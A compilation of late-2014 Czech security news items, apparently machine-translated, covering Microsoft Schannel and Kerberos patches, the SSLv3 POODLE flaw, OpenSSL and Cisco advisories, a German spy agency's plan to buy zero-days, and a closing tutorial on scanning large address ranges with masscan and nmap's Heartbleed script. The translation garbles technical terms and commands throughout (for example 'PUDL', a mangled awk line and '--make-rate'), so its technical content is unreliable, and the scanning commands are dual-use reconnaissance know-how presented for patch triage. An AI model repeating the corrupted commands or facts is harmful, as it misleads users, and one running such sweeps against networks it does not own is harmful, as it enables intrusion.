Microsoft uzavřel spoustu nedostatků, včetně 0-day zneužívaný červ týmem, v listopadových Patch úterý. Ale je tu další chyba, že byste měli být starosti a měl by zavést patch pro co nejdříve: ten, který ovlivňuje Secure Channel (Schannel) bezpečnostní balík Microsoft ve všech podporovaných verzích systému Microsoft Windows. Schannel implementuje bezpečnostní protokoly, které umožňují ověření totožnosti a bezpečné soukromé komunikaci mezi klientem a serverem přes web pomocí šifrování. Podle doprovodné bulletinu zabezpečení , tam žádné polehčující faktory nebo řešení pro tuto chybu zabezpečení - dabovaný WinShock někteří. - tak může být používání náplasti by měla být musí "servery a pracovní stanice se systémem ohroženou verzi Schannel jsou nejvíce ohroženy," varoval společnost. "Útočník by se mohl pokusit o zneužití této chyby odesláním speciálně vytvořených paketů na server se systémem Windows," uvedly, a výsledek těžby by mohla být vykonání libovolného kódu na cílovém serveru. Naštěstí, nejsou tam žádné zprávy o bug zneužívána V útocích ve volné přírodě. aktualizace také obsahuje nové dostupné TLS šifrovací apartmá v Schannel. "Tyto nové šifer pracují ve Osnova / režimu čítače (GCM), a dva z nich nabízejí perfektní Forward Secrecy (PFS) pomocí Dhe výměnu klíčů spolu s ověřování RSA," upozornil Microsoft ven. Microsoft neříká, kdo objevil chybu , jen to, že obdržel informace o tom prostřednictvím koordinovaného zveřejnění zranitelnosti. Podle Qualys ČTÚ Wolfgang Kandek, Opravy "jsou výsledkem vnitřního přezkumu kódu společnosti Microsoft, která odhalila řadu otázek korupce paměti v Schannel v obou serverů a klientských rolí. " "Chyby jsou soukromé, neboť bylo zjištěno, Microsoft interně a zatímco Microsoft považuje za technicky náročné kód využívat, je to jen otázka času a zdrojů, a to je rozumné nainstalovat tento bulletin v příštím cyklu aplikace náplasti," mu poradil . "I když žádný důkaz o kódu, který ještě na povrch, díky Microsoft naštěstí je málomluvný o přesné informace o zranitelnosti, to nebude trvat dlouho, dokud člověk dělá, které by mohly být katastrofální pro jakýkoli správce, který není aktualizovány, "poznamenal Gavin Millard, EMEA technický ředitel pro Tenable Network Security. "Je to nesmírně důležité, že všechny verze systému Windows jsou aktualizovány díky schopnosti útočníků spustit kód na serveru vzdáleně, což jim umožňuje získat přednostní přístup k síti a povede k dalšímu využití, jako hostitele infikovat malwarem nebo rootkity a exfiltrace citlivých údajů. " "Je" WinShock "tak hrozné, jak Shellshock a Heartbleed? V současné době, vzhledem k nedostatku detailů a proof of concept kódu, to je těžké říci, ale vzdálené spuštění kódu ovlivňuje všechny verze serveru Windows na společné komponenty, jako je Schannel je tam s nejhorší z nich, "dodal . "Podle obvykle s" Bug Du Jour ", že je důležité, aby upmost je identifikována a opravenou každý systém v prostředí, v případě potřeby, aby se snížilo riziko ztráty dat z cílených útočníků a jejich dopad červy nebo malware které mohou povrch v nadcházejících dnech. " Dalším závažným chybu, která byla oprava je téměř dvě desetiletí starý zranitelnost našel týmem IBM X-Force pro výzkum. "chyba může být použit útočník pro drive-by útoky spolehlivě spustit kód na dálku a převzít kontrolu nad počítači uživatele - dokonce uhýbat Enhanced Protected Mode (EPM), pískoviště, v IE 11, jakož i vysoce ceněné Enhanced Mitigation Experience Toolkit (EMET) anti-využívání nástroje Microsoft nabízí ke stažení zdarma, "říká IBM Robert Freeman.

SAP konečně záplaty kritické, vzdáleně zneužitelné chyby v GRC řešení
20.11.2014 Zranitelnosti
Více než rok a půl poté, co byly oznámeny SAP AG, společnost vydala patch pro řadu kritických bezpečnostních chyb využitelných na jeho řízení, rizik a software Compliance (GRC). "SAP GRC Access Control má více vzdálených zranitelnosti, které mohou umožnit útočníkovi zvýšit privilegia, obejít omezení SOD a spustit libovolné programy. Útočník může také tyto chyby zabezpečení zneužít vzdáleně pomocí RFC protokolu, nebo pokud SOAP-RFC je aktivní, přes http / https, "výzkum německo-založené bezpečnostní SAP Společnost ESNC hlášena zpravodaji zabezpečení vydaného v úterý. objevena ESNC zakladatele Ertunga Arsal a bezpečnost SAP konzultant Mert Suoglu a hlášeny společnosti 1. dubna 2013 se chyby ovlivňují jedinou funkci. Využití vyžaduje autentizaci, ale chyba je skóre závažnosti je však velmi vysoká. "Doporučujeme zákazníkům SAP aplikovat opravy zabezpečení [ SAP Note 2039348 ] a realizovat návod k obsluze dodaných výrobcem, "poradil mu vědci ESNC, a poznamenal, že zákazníci jeho bezpečnosti Suite byly chráněny proti zneužití této chyby zabezpečení od dubna 2013. Také, že využívají pro připojení je dostupné v Penetrační testování modulu tohoto řešení této chyby zabezpečení.

Microsoft záplaty Windows, IE, Word, SharePoint a IIS
20.11.2014 Zranitelnosti
Tento měsíc Microsoft se zveřejněním 14 bulletiny s novými verzemi a záplat pro své softwaru, operačních systémů a aplikací. To je jeden z méně bulletin než Microsoft oznámil minulý týden. Nejdůležitější bulletin MS14-064 řeší aktuální 0 dnů - CVE-2014 - 6352 v balírny OLE Windows pro Windows Vista a novější verze operačního systému. Útočníci byli zneužívají zranitelnost získat spuštění kódu zasláním PowerPoint souborů do svých cílů. Microsoft již dříve uznal chybu zabezpečení v bezpečnostní poradenství KB3010060 a nabídl práce kolem pomocí Emet a dočasné náplast v podobě FIXIT. Toto je poslední oprava OLE Packager (Microsoft se oprava stejný software, v říjnu již s MS14-060 ), která by měla řešit všechny známé využít vektorů. Vřele doporučuji a naše top náplast tento týden. MS14-066 je nová verze aplikace Internet Explorer, která se zabývá 17 zranitelností. Nejzávažnější z nich by mohly být použity k získání kontroly nad cílové zařízení. Útok bude mít formu škodlivého webové stránky, která cílené uživatel musí procházet. Existují dva základní scénáře, které útočníci často používají: v první uživatel přejde na místo jejich vlastní vůle, možná jako součást každodenního života , ale útočník získal kontrolu nad stránek v otázce prostřednictvím samostatného zranitelnosti a je schopen zasadit škodlivý obsah na webu. Jako příklad, mít poslední chyby (CVE-2014 do 3704) v obsahu Drupal systém řízení, který vystavena více než 12 milionů stránek na tento typ situace. Pomocí chybu, útočník má plnou kontrolu nad webu a může zasadit škodlivé stránky na jinak nevinné místě. Druhý scénář je, že útočník zřídit nový web a pak přímý provoz na ní pomocí vyhledávání manipulací lokomotiva, tj lokalit purporting mít nejnovější obrázky na nedávné události obecného nebo specifického zájmu, říkají, že soud Oscar Pistorius nebo prohlášení amerického prezidenta na neutrality sítě. MS14-066 je naše druhá žebříčku náplast tento týden. Mimochodem, pokud spustíte aplikaci Internet Explorer 10 nebo 11 se také dostat automatickou aktualizaci Adobe Flash tento měsíc. Žádné velké překvapení zde, protože to dosud stalo, každý měsíc v roce 2014. Uživatelé starších prohlížečích Internet Explorer je třeba stáhnout své vlastní aktualizace, jak spojeny APSB14-24. Naším třetím pořadí bulletin MS14-069 řeší Microsoft Word 2007 a poskytuje opravy pro vzdálené spuštění kódu (RCE) zranitelnosti. Scénář útoku je zde nebezpečný dokument, který útočník připravuje zneužít tuto chybu zabezpečení. Útočníci pak poslat dokument přímo, nebo odkaz na své cíle a využívat sociální inženýrství, jako legitimního znějícími názvy souborů a popisů obsahu, které jsou pravděpodobně úroku z cíle v otázce. Pokud spustíte novější verze Microsoft Office nejste zranitelní, ale uživatelé Office 2007 by měl klást velký důraz na tomto bulletinu. Microsoft patří vysoce příští bulletin MS14-066, která se zabývá řadu zranitelností v šifrování složky Windows s názvem Schannel , který se používá pro připojení na SSL a TLS. Opravy v tomto bulletinu jsou výsledkem vnitřního přezkumu kódu společnosti Microsoft, která odhalila řadu otázek korupce paměti v Schannel v obou serverů a klientských rolí. Chyby jsou soukromé, neboť bylo zjištěno, Microsoft interně a zatímco Microsoft považuje za technicky náročné kód využívat, je to jen otázka času a zdrojů, a to je rozumné nainstalovat tento bulletin v příštím cyklu aplikace náplasti. Zbývající bulletiny řešit řadu různých operačních systémů a platforem a obsahují řadu serverových zranitelností: MS14-073 Microsoft SharePoint a MS14-076 v IIS. Jeden poslední zvědavý zranitelnosti: MS14-078 opravuje chybu (CVE-2014-4077) problém součást systému Windows pro japonský vstup. Zranitelnost se musí používat ve spojení s jiným, aby si vzdálené spuštění kódu. To byl napaden ve volné přírodě. Útočníci odesílat dokumenty Adobe PDF, které obsahují speciální mal formátu slovník, který může vyvolat IME využít. Pokud váš Adobe Reader je na nejnovější aktualizace sady, nebo pokud používáte jiný PDF renderovací program, který není touto chybou ohroženy. Konečně, Microsoft zadržel jeden z kritických zranitelností Windows, jak se ukázalo, některé poslední problémy minute stability. Je to soukromá známou chybu, takže by to nemělo mít zásadní vliv na vaše bezpečnostní situaci, ale my víme, že bude mít alespoň jeden zásadní oprava Windows příští měsíc v prosinci. Autor: Wolfgang Kandek, CTO, Qualys.

Microsoft uvolnil Kritická out-of-band opravy pro Kerberos Bug
19.11.2014 Zranitelnosti

UPDATE-Microsoft v úterý vydala vzácné out-of-band patch pro kritické zranitelnosti v několika verzích systému Windows a Windows Server, včetně systému Windows 8 a 8.1.

Ms14-068 chyba je chyba v implementaci protokolu Kerberos v systému Windows, které by mohlo umožnit útočníkovi zvýšit své oprávnění na počítači od uživatele správce. Chyba je označena jako kritická a Microsoft řekl, že to už je používán v cílených útoků.

"Tato aktualizace zabezpečení řeší soukromě oznámenou chybu zabezpečení v systému Microsoft Windows Kerberos KDC, které by mohlo útočníkovi dovolit zvýšit neprivilegované uživatelský účet domény, oprávnění pro ty z účtu správce domény. Útočník by mohl využít těchto zvýšených oprávnění ke kompromisu libovolného počítače v doméně, včetně řadičů domény. Útočník musí mít platnou doménu pověření pro tuto chybu zabezpečení zneužít, "uvedl Microsoft v poradenství.

"Postižená součást je k dispozici na dálku uživatelům, kteří mají standardní uživatelské účty s pověření domény; to není případ pouze uživatelům s pověření místního účtu. Byla v době zveřejnění tohoto bulletinu společnost Microsoft si byl vědom omezených cílených útoků, které se pokoušejí tuto chybu zabezpečení zneužít. "

Původně, Microsoft plánuje vydat patch pro tuto chybu zabezpečení, MS14-068, 11. listopadu, se zbytkem na měsíc Patch Tuesday opravy . Nicméně, oprava nebyla zahrnuta v tomto vydání. Žádný důvod byl dán k opomenutí, ale v minulosti Microsoft má zpoždění opravy, které ještě nebyly připraveny nebo způsobené problémy v testování. MS14-068 zranitelnost je hodnocena jako kritická a společnost nabádá uživatele k instalaci opravy hned.

"Exploit nalezen in-the-wild cílené na zranitelné kód cestu v řadičích domény se systémem Windows Server 2008R2 a pod. Společnost Microsoft zjistila, že řadiče domény se systémem 2012 a výše jsou náchylné k útoku související, ale bylo by mnohem obtížnější využívat. Řadiče domény se systémem Non-všechny verze systému Windows získáváte "hloubkové ochrany" aktualizace, ale nejsou touto chybou, "uvedl tým Microsoftu Świat v blogu příspěvek .

Tam je další chyba, že Microsoft také plánuje opravit 11. listopadu, že dosud nebyla stanovena. MS14-075 byla odložena a společnost dosud oznamuje datum vydání pro tuto opravu.

Německý špionážní agentura chce koupit a používat 0 celodenní chyby
19.11.2014 Zranitelnosti
Spolková zpravodajská služba (BND) - Německý spolkový Intelligence Service - požádal parlamentní dohled výboru pro velké peníze na nákup zranitelnosti na volném trhu, Sueddeutsche Zeitung hlášeny ( pomocí Google Translate .) v pondělí by to neměl být velmi důležitý kus Zprávy kdyby nebylo skutečnosti, že se snaží získat chyby, aby jejich použití se a ne sdílet informace s vývojáři softwaru a veřejnosti. Podle důvěrné zprávy, viděl reportéry novin, agentura žádá o celkem o 300 milionů € na financování jeho strategické technické iniciativy v příštích 5 letech (28 milionů € 2.015). Program SIT byla založena s cílem, mimo jiné, naleznete bezpečnostní díry v protokolech SSL a HTTPS, které jsou používány bankami a e-commerce weby k zajištění transakcí, ale také sociální sítě a další on-line služby pro zajištění přístupu k účtům uživatelů. BND také chce vytvořit systém včasného varování pro kybernetické útoky a honeypot, stejně jako najmout další IT profesionály, jejichž úkolem bude, aby vládní sítě bezpečný identifikace softwaru zranitelnosti sami. A konečně, chtějí vytvořit systém pro sledování aktivity na sociálních sítích v reálném čase získat přesnější obraz o situaci v zahraničí. Sledování by být omezen na data z non-německé uživatele - informace napsána v německém jazyce a pochází z německého umístění by být zlikvidován pomocí speciálně nastavit filtry. Tyto objevy byly vypracovány kritiku z různých stran, včetně Chaos Computer Club. "Navrhovaná akvizice a prodej zranitelných míst BND by byla právně sporné, a to nejen v několika způsoby, ale je také přímé a úmyslné poškození německé ekonomiky," poznamenal ( via Google Translate ) CCC mluvčí Dirk Engling. Řekl, že BND žízeň po využitelných zranitelnosti je vážný zásah do základních práv. Uživatelé nebudou moci bránit nejen proti špionáže, ale také proti kybernetické podvodníci, které využívají těchto chyb, které vláda bude znát, ale nebude se rozhodli uveřejnit. Poukázal na to, že peníze za těmito chybami přichází od daňových poplatníků, a že je lepší utratit na softwarové audity. Stefan Körner, prezident německé Pirátské strany, poznamenal, že "pokud se jedná o strategii vlády pro naši bezpečnost, měli bychom jim a jejich zpravodajské agentury se obávají více než nebezpečí kybernetického teroru, že vždycky humbuk kolem. "

Technologie NFC obsahuje závažné bezpečnostní chyby

17.11.2014 Zranitelnosti
Bezpečnostní experti nalezli v mobilní platební technologii Near Field Communication (NFC) několik závažných chyb, díky kterým by útočníci mohli získat data z telefonů nic netušících uživatelů.

Technologie NFC, kterou podporuje řada nových smartphonů, umožňuje lidem platit za zboží a služby pomocí mobilního zařízení pouhým přiložením k platebnímu terminálu (podobně jako třeba při placení bezkontaktní kartou).

Bezpečnostní experti však nyní na soutěži Mobile Pwn2Own, již v Tokiu uspořádala americká společnost Hewlett-Packard, ukázali v NFC závažné chyby, jejichž chybou by se potenciální útočníci mohli jednoduše dostat k datům uloženým na mobilních zařízeních.

Na Mobile Pwn2Own se experti a hackeři z celého světa pokoušeli o prolomení bezpečnostních systémů u různých mobilních telefonů, mezi něž patřily například iPhone 5S, BlackBerry Z30, Amazon Fire Phone či Google Nexus 7.

Účastníci soutěže, kterým se podařilo pomocí nalezených chyb získat přístup k datům na těchto zařízeních, si mezi sebe nakonec rozdělili 425 tisíc dolarů (v přepočtu devět milionů korun). Pravidlo bylo pouze jediné: podniknout do třiceti minut úspěšný útok s využitím dříve neznámé bezpečnostní díry. V první den soutěže se pěti týmům podařilo ovládnout pět různých zařízení. Tři týmy zneužily díru v NFC, díky níž hackeři získali přímý přístup k datům uloženým na telefonech. Další dva útoky byly provedeny skrze mobilní webové prohlížeče. Útočníci dokázali ovládnout Apple iPhone 5S, Samsung Galady 5, LG Nexus 5 i Amazon Fire Phone.

Podrobné informace o zneužitých chybách byly předány tvůrcům příslušných technologií. Následně hackeři data zpřístupní i veřejnosti.

Belkin Router Apocalypse: heartbeat.belkin.com výpadek, přijímání routery dolů

10.11.2014 Zranitelnosti
Podle ot různých zpráv, mnoho uživatelů Belkin směrovače jsou problémy s připojením k internetu, poslední noci. Zdá se, že router bude občas ping heartbeat.belkin.com detekovat připojení k síti, ale "tep" hostitel není dostupný na některých (všech?) uživatelů. V současné době, hostitel reaguje na zprávy ICMP Echo Request, ale zdá se, že mnoho Belkin směrovače jsou stále dolů.

Jako řešení, můžete přidat položky do hostitelského souboru routerů směřující heartbeat.belkin.com na 127.0.0.1. Zdá se, že zrušení zablokování. "Blok" má vliv pouze na DNS server na zařízení. To bude cesta v pohodě. Stále můžete získat hostitelé v síti pracovat tak dlouho, jak nastavit server DNS ručně, například pomocí DNS server společnosti Google v 8.8.8.8. ,

Pro prohlášení Belkin, viz https://belkininternationalinc.statuspage.io

V tweetu, Belkin poukázala na tuto stránku na své komunitní fórum: http://community.belkin.com/t5/Wireless/Belkin-Routers-Internet-Outage/mp/5796#M1466

OpenSSL Vulnerability unikly přes OpenBSD patche (ne!)?

10.11.2014 Zranitelnosti
Včera, několik zpravodajských serverů publikoval spekulativní zprávy o možném OpenSSL chyba je dnes pevnou. Podle těchto zpráv, chyba ovlivňuje SSL 3 a je "kritický". Nelze čekat na oficiální oznámení, aby viděli, co se tu vlastně děje;-)

Zpočátku to vypadalo, že OpenBSD náplasti vede k odpovědi, ale ukazuje se, patch byl starý (thx pro ty, kdo napsal a odpověděl, a to zejména na základě tweetu podlemartijn_grooten). Ale místo toho, že jsou nové vede nyní, zejména diskuse o Stackexchange [1]. V této diskusi komentář Thomas Pornin nastiňuje, jak výplň SSLv3 může vést k MITM útoky. To by bylo úplně útok proti protokolu SSLv3, a méně na konkrétní implementaci. To by mělo dopad klienty, stejně jako servery.

Budeme aktualizovat tento příspěvek jak se dozvědět více. V tomto okamžiku: Nepropadejte panice a čekat na opravu od svého příslušného prodejce. Nejsme si vědomi jakéhokoliv aktivního využití tohoto problému, ale prosím, dejte nám vědět, pokud najdete jakékoliv důkazy, že se tak stane.

Pokud se rozhodnete zakázat SSLv3 na serveru, ale ponechat TLS 1.0 povolen, Windows XP s IE 6 už nebude moci připojit (ale starší verze IE budou moci připojit z počítačů se systémem Windows XP).

Jak můžete otestovat, zda server podporuje SSLv3? Buď použijte ssllabs.com, nebo pomocí openssl klienta: (je-li připojen, podporuje SSLv3)

openssl s_client -ssl3 -connect [webový server]: 443

Jak mohu zkontrolovat, zda můj prohlížeč může žít bez SSLv3? Pokud toto čtete, pak podporujete TLSv1 nebo vyšší. I vypnutá podpora SSLv3 na této stránce nyní. Ale skoro všechny prohlížeče podporují SSLv3.

Můžete nám říct, aby nepodléhali panice, ale obrátil na SSLv3? Ano. Chtěl jsem vidět, co se stane, když vypnu SSLv3. Zatím jediný problém jsem našel byl Windows XP s IE 6, konfigurace Asi nechtějí podporovat tak jako tak.

[1] http://chat.stackexchange.com/transcript/message/18152298#18152298

SSLv3 PUDL Vulnerability Oficiální zpráva

10.11.2014 Zranitelnosti
Nakonec jsme dostali oficiální oznámení. Pro všechny podrobnosti přeskočit přímo na původní oznámení [1]. Níže naleznete TL; DR; verze:

Problém je omezena na SSLv3. SSLv3 je často považována za podobnou TLSv1.0, ale tyto dva protokoly jsou různé.

SSLv3 měl problémy v minulosti. Vzpomeňte si na útok bestii? To bylo nikdy nevymizí (jiné než se stěhuje do TLS 1.1 / 2). Jedinou možností bylo použít proudová šifra RC4 jako, který měl své vlastní problémy.

Ale to PUDL problém je jiný. S blokové šifry, máme druhý problém: Co když se blok pro šifrování je příliš krátký? V tomto případě, výplň se používá dohnat chybějící údaje. Vzhledem k tomu, výplň je nelze považovat část zprávy, že se nevztahuje na MAC (Message autorizační kód), který ověřené integritu zprávy.

Takže co to znamená v reálném žít? Dopad je podobný útoku zvíře. Útočník může hrát buď MITM, nebo může být schopen dešifrovat části zprávy v případě, že útočník je schopen aplikovat data do spojení stejně jako při útoku šelmy. Útok umožňuje, aby jeden dešifrovat jeden byte v době, v případě, že útočník je schopen aplikovat zprávy hned po tom byte, které obsahují pouze polstrování.

Co byste měli udělat: Zakázat SSLv3. Neexistuje žádný patch pro to. SSLv3 dosáhla konce své životnosti a měla by být v důchodu.

To není "náplast teď". Dejte mu nějaký čas, vyzkoušet si to pečlivě, ale jít s ním. Dalším problémem je, že se jedná o klient a problém serveru. Je třeba zakázat SSLv3 buď. Začněte se servery pro největší vliv, ale pak se podívat, co můžete dělat o klienty.

Druhá možnost "opravit" tohoto problému je použití implementace SSL, které využívají funkce TLS_FALLBACK_SCSV. Tato funkce upozorní na druhou stranu, že se nejprve pokusil silnější šifru. Tímto způsobem mohou odmítnout pokus o downgrade, který může byli představeni útoku MITM. Ale není jasné, které implementace použití této funkce se v tomto bodě, a které ne. Patch pro OpenSSL 1.0.1 byla vydána dnes ráno k provedení TLS_FALLBACK_SCSV

FAQ

Chcete-li vyzkoušet, zda váš server zranitelný: Použití https://ssltest.com

Chcete-li vyzkoušet, zda váš klient je zranitelný: setup jsme zkušební stránku na https://www.poodletest.com . Pokud se můžete připojit, pak váš klient podporuje SSLv3.

Zatím jsme testovali:

Firefox 32 IE 11 Safari 7.1 Chrome 37 Opera
Windows 7 ok vuln vuln vuln
OS X 10.9.5 ok N / A vuln vuln
iOS 8.0.2 vuln N / A vuln vuln vuln
Chcete-li vypnout podporu SSLv3 v aplikaci Internet Explorer 11:

Nastavení -> Možnosti Internetu -> Upřesnit -> Zrušte zaškrtnutí políčka "SSLv3" pod položkou "Zabezpečení".

OpenSSL OpenSSL zprávy 1.0.1j, 1.0.0o a 0.9.8zc

10.11.2014 Zranitelnosti
Tato aktualizace na OpenSSL knihovny řeší čtyři chyby zabezpečení. Jedním z nich je "PUDL" zranitelnost oznámil včera.

CVE-2014-3513: nevracení paměti v analýze DTLS SRTP zpráv může vést k odmítnutí služby. Ty jsou ohroženy, pokud to konkrétně sestavil svou knihovnu OpenSSL s možností "OPENSSL_NO_SRTP". Všechny 1.0.1 verze OpenSSL jsou postiženy.

CVE-2014-3567: Další nevracení paměti, které může vést k DoS útok. V tomto případě, paměti není uvolnit, pokud jízdenka SSL relace selže kontrolu integrity. OpenSSL 0.9.8, 1.0.0 a 1.0.1 jsou ovlivněny.

CVE-2014-3566 (PUDL): OpenSSL nyní podporuje TLS_FALLBACK_SCSV zabránit MITM z devalvace připojení SSL. To má vliv na OpenSSL 1.0.1, 1.0.0 a 0.9.8.

CVE-2014-3568: "no-SSL3" stavět možnost, která je určena k zakázání SSLv3, může ve skutečnosti nefunguje tak, jak inzeroval. Tohle je samozřejmě zvláště důležité, pokud se pokusíte vypnout SSLv3.

Také OpenSSL 0.9.8 je nyní oficiálně konec životnosti. Neočekávejte žádné další opravy pro 0.9.8.

Více Chyby Cisco TelePresence Video Communication Server a Cisco rychlostní Software

10.11.2014 Zranitelnosti
Více Chyby Cisco TelePresence Video Communication Server a Cisco rychlostní Software
Advisory ID: cisco-sa-20141015-VCS Cisco TelePresence Video Communication Server (VCS) a Cisco dálnice Software obsahuje následující chyby zabezpečení: • Cisco TelePresence VCS a Cisco dálnice Crafted balíčky Denial of Service Vulnerability • Cisco TelePresence VCS a Cisco dálnice SIP IX Filtr Denial of zabezpečení služby • Cisco TelePresence VCS a Cisco dálnice SIP Denial of Service zranitelnosti úspěšné využití některé z těchto chyb zabezpečení by mohla umožnit neověřenému vzdálenému útočníkovi způsobit reload postiženého systému , což může mít za následek odmítnutí služby (DoS) stavu. Cisco vydala bezplatné aktualizace softwaru, které se zaměřují na tyto chyby. Řešení, která zmírňují tyto chyby nejsou k dispozici. Tento poradní je k dispozici na následujícím odkazu: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs Poznámka: Tento informační zpravodaj zabezpečení neposkytuje informace o GNU Bash proměnné prostředí Command Injekce Chyba (také známý jako Shellshock). Další informace o produktech společnosti Cisco postižených touto chybou, viz Upozornění Cisco Security na následujícím odkazu: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash

Aktualizace Microsoft MSRT říjen

10.11.2014 Zranitelnosti
Minulý týden Microsoft MSRT tlak obsahuje detekcí / Stěhování několik používaných APT nástrojů. Koalice (v čele s Novetta ), která přinesla zahrnutí těchto nástrojů v tomto měsíci MSRT, jsou povzbudivé podniky tlačit / spustit tento měsíc MSRT aktualizace. Některé malware obsažené v tomto měsíci MSRT aktualizace jsou předběžná zpráva zveřejněny zde .

Pokud používáte buď Snort nebo SourceFire, ruleID detekovat některé z hrozeb / rodiny v tomto měsíci MSRT tiskové zprávě jsou uvedeny níže a mohou být staženy z Snort nebo Sourcefire VRT předplatného.

Derusbi - 20080
Fexel - 29459
Hikit - 30948
DeputyDog - 28493
Hydraq - 16368, 21304
Darkmoon - 7816, 7815, 7814, 7813, 12715, 12724
Zxshell - 32180, 32181

[1] http://blogs.technet.com/b/mmpc/archive/2014/10/14/msrt-october-2014-hikiti.aspx
[2] http://www.microsoft.com/security/pc -Bezpečnost / malware-removal.aspx
[3] http://novetta.com/commercial/news/resources/
[4] https://www.snort.org/downloads/#rule-downloads

Digest: 23 OCT 2014

10.11.2014 Zranitelnosti
Počet položek na vaši pozornost dnes, čtenáři. Díky jako vždy na naší Rob Vandenbrink pro spárování řadu z nich .

V případě, že jste vynechal to, co je nového v ve Windows PowerShell .

Nová Snort zpráva je k dispozici: Snort 2,97 .

VMWare vydala informační zpravodaj zabezpečení: VMSA-2014-0011 - VMware vSphere Data Protection Aktualizace produkt řeší kritickou zveřejňování informací zranitelnost.

Je tu Whitehouse petice k odemknutí přístupu veřejnosti k výzkumu v oblasti bezpečnosti softwaru prostřednictvím zákona DMCA a reformy CAFA. Potřebuje 98.000 podpisy, v současné době má jen něco málo přes 1000. synopse k úvaze:

Software nyní běží spotřební výrobky a kritických systémů, které věříme, s naší bezpečnosti. Například, auta, zdravotnické zařízení, hlasovací zařízení, rozvodných sítí, zbraňových systémů a akciových trhů spoléhají na kód. Zatímco zodpovědných firem spolupracovat s technickou obcí a veřejnosti s cílem zlepšit bezpečnost kódu, jiní ne. Oni místo toho se snaží, aby se zabránilo výzkumným pracovníkům a ostatním, sdílení bezpečnostní výzkum, hrozí trestní a občanskoprávní žaloby v rámci zákona Digital Millennium Copyright a počítačové podvody a zneužívání zákona. Chlazení výzkum nás všechny ohrožuje. Ochrana veřejnosti před nebezpečným kódem a pomáhají nám, abychom se ochránili. Reformovat DMCA a CAFA odemknout a podněcovat výzkum o potenciálně nebezpečných bezpečnosti a bezpečnostních slabin v softwaru.

Pokud souhlasíte, podepište petici zde .

NIST právě vydala návrh NIST Special publikace 800-125-A bezpečnostní doporučení pro Hypervisor nasazení . Vy obyvatelé oblaku by měla tento jeden dobrý pročíst.

Skenování Single kritických zranitelných míst

10.11.2014 Zranitelnosti
Kde pracuji, máme slušné velikosti IP prostor a skenování může být problematické. V rámci naší IP prostoru, můžeme mít ~ 20 miliónů IP adres k dispozici. Tradiční skenování pomocí nmap, zatímco efektivní, může trvat dlouhou dobu, dokonce i agresivní nastavení skenování. Díky využití nových technologií, jako je skenování Masscan (hxxps: //github.com/robertdavidgraham/masscan), toto skenování lze provést během několika minut. S mírným nastavením, nechci narazit firewally, to trvá asi 15 minut na port.

I když tento příklad je specifický pro Heartbleed, já používám tuto techniku pro některou z využití-of-the-den. Použitím rychlý port scanner snížit počet počítačů pouze na počítačích s operačním systémem danou službu, můžete výrazně urychlit skenovací čas. Navíc, v rámci prvních pár dní využít, může být pomocí vlastního skriptu pro skenování, než plugin z podnikové řešení.

Jiný případ užití je chyba nalezena v průběhu reakce na incidenty. Kdybych určit konkrétní zranitelnost byla použita ke kompromisu server, pak jsem použít tuto techniku k určení dalších možných narušit systémy. Pokud by nebyly ohroženy, pak jsme je patch.

Masscan
Instalace nástroje je snadná

> Git clone https://github.com/robertdavidgraham/masscan

> Cd masscan /

> Dělat; make install

Masscan používá podobný příkazového řádku nmap.

> Masscan -p 443,448,456,563,614,636,989,990,992,993,994,995,8080,10000

10.0.0.0/8 -oG 10-scan-ssl - -max-rate 10000

Výstup -oG Grepable

-p port pro skenování

10.0.0.0/8 síť pro skenování

-oG Výstup v grepable formátu

10-scan-443 je název souboru vytvořen skenování

--make-rate nastavuje rychlost skenování

Jakmile Masscan rychle identifikovat cíle pro hlubší kontrolu, můžete použít konkrétnější nástroj k určení, zda je systém zranitelný. V tomto příkladu, jeho nmap zásuvný modul.

NMAP
cd / tmp

> Svn co https://svn.nmap.org/nmap

> Cd nmap

> ./ Configure, aby, make install

Chcete-li získat vstupní soubor ve správném formátu, použijte následující příkaz, aby si jen soubor s jedinou IP na řádek.

> Grep -v '#' 10-scan-443 | awk '{print 2 dolary} "> / tmp / nmap

Chcete-li spustit nmap, ujistěte se, že máte správné porty zadané, konkrétní skript, který potřebujete, a určete správný vstupní soubor.

> Nmap -p 443,448,456,563,614,636,989,990,992,993,994,995,8080,10000 --script = ssl-heartbleed.nse -il / tmp / nmap -oA / tmp / ssl-vul-test

Měl jsem smíšené výsledky s jinými skenery (scanrand atd ..). Jakékoliv jiné velkokapacitní skenery, se kterou jste měl dobrý úspěch?